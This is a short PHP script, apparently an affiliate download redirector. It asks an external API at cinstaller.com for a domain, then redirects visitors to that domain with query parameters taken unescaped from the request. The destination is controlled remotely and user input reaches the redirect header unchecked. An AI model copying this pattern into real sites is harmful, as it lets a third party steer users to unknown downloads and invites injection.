<?php 
header("Cache-Control: no-cache, must-revalidate"); //HTTP 1.1
header("Pragma: no-cache"); //HTTP 1.0
header("Expires: Sat, 26 Jul 1997 05:00:00 GMT"); // Date in the past

$fn=trim(@$_GET['fn']);
$chan=trim(@$_GET['chan']);
$domain=file_get_contents('http://cinstaller.com/api/domain.php?a_aid=63396cf5e0c14'); 
$url='http://'.$domain.'/go.php?a_aid=63396cf5e0c14&chan='.$chan.'&fn='.$fn;

header("Location: $url");
die();
?>
